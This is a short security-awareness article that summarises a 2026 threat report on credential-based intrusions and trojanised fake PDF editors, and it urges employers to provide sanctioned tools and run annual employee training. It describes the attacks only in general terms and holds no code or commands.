Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results showed that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees on an ongoing basis of how important it is to protect their usernames and passwords and to be highly vigilant when being asked to divulge them.
According to the Report, more than 68% of reported incidents were identity-based: where a threat actor attempts to use an authorized user’s credentials to access a company’s network. Many used agents that the organization did not authorize, a clear indication that it was not the authorized user trying to logon. In addition, 12% of incidents involved a logon from a suspicious location, showing that companies may wish to monitor and block any logon attempts from unauthorized locations, including foreign countries.
The Report notes that “fake PDF editors continue to be a major problem.” If a user does not have access to a company sanctioned PDF editor, users may search on the Internet for one to assist with editing a PDF to make a project easier. If a user downloads a fake PDF editor like SupremePDF, the user is unaware that the fake PDF editor can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”
According to Expel,
these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.
Once the threat actor downloads the second payload, it can then move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along to users as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.
If you haven’t scheduled your cybersecurity annual training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.
